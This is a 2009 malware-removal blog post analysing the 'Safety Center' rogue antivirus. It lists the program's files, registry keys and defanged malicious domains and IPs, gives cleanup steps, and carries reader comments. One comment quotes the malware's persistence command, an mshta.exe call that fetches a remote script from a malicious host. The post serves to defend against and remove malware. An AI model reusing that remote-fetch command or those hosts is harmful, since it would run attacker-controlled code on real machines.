Subscribe to Malware Help RSS Feed RSS Feed - Subscribe to Malware Help. Org on Twitter Follow on Twitter - Malware Help YouTube Channel YouTube Channel - Subscribe to Malware Help by Email Subscribe by Email

Safety Center Analysis and Removal

by Shanmuga| Tweet This | Google +1 | Facebook | Stumble It | Reddit | Digg | del.icio.us

Safety Center…a rogue security software, mimics Windows Security Center and tries to passes itself as a legitimate security suite. In addition to the various popups it also uses fake voice alerts and desktop hijack to scare the user to buy the bogus application. It uses a combination of animated images which gives the impression of an online scan to hop on to the system. Once installed it uses Microsoft HTML Application host (mshta.exe) to access the Internet.

0001 Safety Center Analysis and Removal

A rogue security software belongs to a family of software products that call themselves as antivirus, antispyware or registry cleaners and often use deceptive or high pressure sales tactics and deliberate false positives to convince users into buying a license/subscription. They are often repackaged and renamed. They do not actually remove malware instead many of them add more malware of their own.

0002 Safety Center Analysis and Removal

Safety Center Associated Files and Folders

  • C:\Program Files\SafetyCenter\protector.exe
  • C:\Documents and Settings\malwarehelp.org\Local Settings\Temp\~5.dll
  • C:\Program Files\SafetyCenter\protector.exe
  • C:\Documents and Settings\malwarehelp.org\Local Settings\Temp\protect.exe
  • C:\Program Files\SafetyCenter\main.ico
  • C:\Program Files\SafetyCenter\sound.wav
  • C:\WINDOWS\Prefetch\PROTECTOR.EXE-0DBCCE3A.pf
  • C:\Documents and Settings\All Users\Application Data\00045109
  • C:\Program Files\SafetyCenter

Safety Center Associated Registry Values and Keys

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B8C60D42-9881-11DE-B7C5-CD5255D89593}
  • HKCR\CLSID\{B8C60D42-9881-11DE-B7C5-CD5255D89593}
  • HKCR\CLSID\{B8C60D42-9881-11DE-B7C5-CD5255D89593}\InprocServer32
  • HKCR\CLSID\{B8C60D42-9881-11DE-B7C5-CD5255D89593}\InprocServer32#ThreadingModel
  • HKU\S-1-5-21-746137067-776561741-1417001333-1004\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B8C60D42-9881-11DE-B7C5-CD5255D89593}

Safety Center Associated Domains

This scareware was observed accessing the following domains during installation and operation:

  • http://ekacleaner info
  • http://3uxyctrlmiqeo cn
  • http://crusade-affiliates com
  • http://urodinam net
  • http://212.117.160 18
  • http://85.17.139 149

Note: Visiting the domains mentioned above may harm your computer system.

Safety Center Removal (How to remove Safety Center)

The free versions of MalwareBytes’s Anti-Malware and SuperAntiSpyware appear to remove this rogue security software.

  1. Use an alternate browser like Firefox or Chrome to download and Install either MalwareBytes’s Anti-Malware or SuperAntiSpyware from the links above.
  2. Also download CCleaner.
  3. Boot in to Windows Safe mode.
  4. Click to scan with your chosen software. Check mark all instances of the rogue security software and delete them.
  5. Turn System Restore off and on.
  6. Install, scan and clean the temporary files with CCleaner.

You should now be clean of this rogue.

Safety Center — Screenshots

Safety Center — video

Note: The above installation and removal was tested on a fully patched Windows XP SP3 running updated versions of Internet Explorer and Firefox. The content provided in this article is not warranted or guaranteed by Malware Help. Org. The content provided is intended for entertainment and/or educational purposes. I am not liable for any negative consequences that may result from implementing any information covered in this article. The above information is correct at the time of my testing, it might change with time and or under different testing conditions.

You may also like to read



{ 4 comments… read them below or add one }

Dave C November 6, 2009 at 3:58 AM

This procedure worked wonderfully on a friend’s diabolically-infested machine. Thanks for the detail and work!

Reply

demax November 6, 2009 at 5:24 AM

Thank you for your blog. The method above does get rid of malware or scareware such as “SafteyCenter”; BUT it does not cleanup the mess left behind. Such as the annoying recreation of MSHTA.EXE every hour, eating up memory.
[if you don't reboot daily, one will have 20 to 30 mshta.exe running -- one can either reboot or terminate {using the task manager} the service running, without harm.]
*********************************************************
The properties of mshta.exe are: (using Process Explorer)
Command Line: mshta.exe http ://urodinum. net/33t.php?stime=1254799590
*********************************************************

While the file mshta.exe itself is not infected, something instructs mshta.exe to
execute presumably thru use of a .xml or .vbs file. The registry is clean, the RUN under both HKLM and HKCU are clean. Several registry cleaners including several RootKit cleaners are unable to find the monster. Neither does NOD32 nor MalwareBytes, plus several more malware or trojan hunter programs. And a “Online Scan” did neither. The only batfile on the computer is “msdtcvtr.bat” used by MS NT tracerpt and edit shows no malware execution.

I have taken several pictures (snagit) of the malware behavior and be glad to send ithem if I knew where to.

mshta-image

de

Reply

Shanmuga November 6, 2009 at 8:14 AM

You can upload the images to any free hosts like imageshack.us and post the link here in a comment or send them by mail to shanmuga((AT))malwarehelp.org. I can add them to your post.

Awry November 12, 2009 at 12:28 AM

The culprit is a batch file I think its in the root c: drive, mine was called BLZ.bat, I edited the bat file deleting everything in the file and resaved it then deleted the bat file itself. This mind you this is after I have malware destroy evil intruder. Cleanup is a good pre cleaning program to use as well to clear the cache and temp files and etc in one step. pretty thorough. I alsot o looked for the bat file in the registry and other places. after which I set the trust zones fire wall and spybot’s tea timer to block url, ip, and, via copy paste of part of the code in the bat file. The client I have they didnt have a antivirus so I added an active antivirus program that was free such as AVG. its good for the basics, ofcourse I used mbam and clamwin.

Reply

Leave a Comment

Previous post:

Next post: